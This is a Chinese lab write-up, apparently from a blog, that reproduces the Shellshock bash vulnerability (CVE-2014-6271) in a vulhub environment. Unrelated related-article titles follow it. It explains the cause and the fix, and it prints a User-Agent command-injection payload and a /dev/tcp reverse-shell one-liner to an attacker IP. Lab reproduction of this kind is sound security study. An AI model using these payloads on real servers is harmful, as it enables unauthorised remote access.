漏洞简介

破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露。许多面向互联网的服务,如一些网络服务器部署,使用bash来处理某些请求,允许攻击者导致脆弱的bash版本执行任意命令。这可以让攻击者获得对计算机系统的未授权访问。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行

漏洞成因

bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。

漏洞范围

bash版本小于等于4.3

漏洞复现

1、打开漏洞地址

2、成功正常访问,打开bp进行抓包(同时抓取两个数据包payload)

3、将payload附在User-Agent中,并发送请求

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

4、可以看到成功执行了命令,以同样的数据在safe.cgi发送请求,发现其不受影响

5、kali开启端口监听,执行反弹shell命令

() { :;}; echo;/bin/bash -i >& /dev/tcp/192.168.217.139/4444 0>&1

6、成功反弹shell

漏洞修复

将bash版本升级到最新版本

vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞相关推荐

  1. 详解ShellShock 漏洞复现原理,内附ShellShock的修复方法

    本篇文章适合初学ShellShock漏洞阅读,如果您已经学习过ShellShock漏洞,可以直接略过.本篇是我们悬镜安全实验室成员之一Kr0iNg's 在学习ShellShock时分享的一点心得,仅供 ...

  2. 漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861)

    文章目录 一.Jenkins简介 二.CVE-2018-1000861简介 三.漏洞复现 一.Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发. 可用于自动化各种任务,如 ...

  3. Shellshock 破壳漏洞(CVE-2014-6271)

    漏洞简介 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义.远程攻击者可借助特制的环境变量利用该漏洞执行任意代码. 漏洞复现 将payload附在Us ...

  4. 【漏洞复现】CVE-2022-22954 VMware Workspace ONE Access漏洞分析

    文章目录 漏洞信息 漏洞分析 漏洞复现 测试脚本 漏洞修复 参考文章 漏洞信息 VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过 ...

  5. 漏洞复现----12、Apache Flink目录穿越漏洞(CVE-2020-17519 )

    文章目录 一.漏洞简介 二.漏洞复现 一.漏洞简介 Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何 ...

  6. 【漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)

    说明:此博客为本人的漏洞复现学习过程记录 前言 漏洞原理:本次的漏洞存在于Sudo上--一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为"Baron Samedit&q ...

  7. 远程桌面漏洞poc_【漏洞复现】CVE 2019-0708 漏洞利用

    0x00 前言 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统.此漏洞是预身份验证且无需用户交互,这就意味着这 ...

  8. 【漏洞复现】RTF URL Moniker 的逻辑漏洞 | OLE2Link 漏洞(CVE-2017-0199)

    一.CVE-2017-0199--类型:OLE对象中的逻辑漏洞 漏洞利用 OFFICEOLE 对象链接技术,将恶意链接对象嵌入在文档中,之后调用 URLMoniker 将恶意链接中的 HTA 文件下载 ...

  9. 【漏洞复现】IE 浏览器远程代码执行漏洞

    Windows VBScript Engine 代码执行漏洞(CVE-2018-8174) 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个 ...

最新文章

  1. MySQL查询面试题
  2. 转:Merge into的使用详解
  3. 简明Linux命令行笔记:finger
  4. config设置源 使用pip_python pip源配置
  5. dspq值多少最好_蜂蜜纯度42的意思?蜂蜜纯度多少度好?
  6. Comware 架构理解
  7. C#通过WebBrowser对网页截图
  8. C++学习记录vs2013 植物大战僵尸mfc辅助大体框架编写
  9. Foxmail登录不上163邮箱。。。
  10. OJ 2306 Problem C Banana
  11. Android集成Bmob后端云
  12. PBR材质基础概念,限制及未来发展
  13. 利用VBA筛选重复数据
  14. java任意键继续_java 按任意键继续怎么写
  15. 启动Mysql时报错:mysqld_safe mysqld from pid file /usr/local/mysql/data/Linux.pid ended
  16. csv 文件读写乱码问题的一个简单解决方法
  17. 163邮箱注册怎么用,有哪些常用的邮箱使用技巧!
  18. 凤凰涅槃,浴火重生。
  19. 微服务RESTful 接口设计规范
  20. Jetson Nano - 自己动手搭建Jetbot环境

热门文章

  1. SDWAN:SD了什么?
  2. 如何计算一只股票收盘价比开盘价上涨多少?并筛选出上升上涨超过5%的股票
  3. 张晓飞ajax聊天室,张晓飞-华中师范大学数学学院中文站
  4. RBF架构下如何解析路径
  5. 移动多媒体知识点期末总结
  6. matplotlib plt.lengend图例放在图像的外侧
  7. Lengend of the Fall
  8. 将exe4j打包的java exe程序反编译过程
  9. XDOJ魔王语言解释
  10. 软件测试 | Mock是什么?